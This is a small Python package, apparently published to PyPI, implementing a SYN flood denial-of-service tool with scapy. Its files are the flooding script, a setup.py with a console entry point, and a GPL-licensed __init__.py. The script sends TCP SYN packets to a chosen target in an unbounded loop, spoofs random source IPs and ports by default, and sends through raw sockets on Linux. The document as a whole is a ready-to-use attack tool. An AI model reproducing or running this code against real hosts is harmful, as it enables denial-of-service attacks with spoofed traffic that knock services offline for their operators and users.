from scapy.all import IP, TCP, RandIP, RandShort, Raw, Ether, send, conf
from platform import system
from argparse import ArgumentParser

if system() == "Linux":
    from socket import socket, SOCK_RAW, AF_PACKET


def parse():
    parser = ArgumentParser()
    parser.add_argument("target", help="Target IP or hostname.")
    parser.add_argument("--dport", "-p", help="Destination port.", default=80, type=int)
    parser.add_argument("--source", "-s", help="Source IP.", default=None)
    parser.add_argument("--sport", "-P", help="Source port.", default=None, type=int)
    parser.add_argument("--data", "-d", help="Additional data", default=None)
    return parser.parse_args()


def synflood(target, dport, source, sport, data=None):
    packet = IP(dst=target, src=source) / TCP(dport=dport, sport=sport)

    if system() == "Linux":
        packet = Ether() / packet
        sock = socket(AF_PACKET, SOCK_RAW)
        sock.bind((conf.iface, 0))
        send_ = sock.send
    else:
        send_ = lambda packet: send(packet, verbose=0)

    if data:
        packet = packet / Raw(data.encode())
        
    if system() == "Linux":
        packet = bytes(packet)

    while True:
        send_(packet)


def launch():
    parser = parse()
    run = True

    while run:
        try:
            synflood(
                parser.target,
                parser.dport,
                parser.source or RandIP(),
                parser.sport or RandShort(),
                parser.data,
            )
        #except OSError:
        #    print("OSError...")
        except KeyboardInterrupt:
            run = False


if __name__ == "__main__":
    launch()



from setuptools import setup, find_packages

setup(
    name = 'SynFlood',
 
    version = "0.0.1",
    packages = find_packages(include=["SynFlood"]),
    install_requires = ['scapy'],

    author = "Maurice Lambert", 
    author_email = "mauricelambert434@gmail.com",
 
    description = "This package implement a DOS (Denial Of Service) tool in python (SYN Flood).",
    long_description = open('README.md').read(),
    long_description_content_type="text/markdown",
 
    include_package_data = True,

    url = 'https://github.com/mauricelambert/SynFlood',
 
    classifiers = [
        "Programming Language :: Python",
        "Development Status :: 5 - Production/Stable",
        "Environment :: Console",
        "Natural Language :: English",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3.8"
    ],
 
    entry_points = {
        'console_scripts': [
            'SynFlood = SynFlood:launcher'
        ],
    },
    python_requires='>=3.6',
)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

""" This package implement a DOS (Denial Of Service) tool in python (SYN Flood). """

###################
#    This package implement a DOS (Denial Of Service) tool in python (SYN Flood).
#    Copyright (C) 2021  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

__version__ = "0.0.1"
__all__ = [ "synflood", "launcher" ]

from .SynFlood import synflood, launch as launcher

print("""
SynFlood  Copyright (C) 2021  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
""")
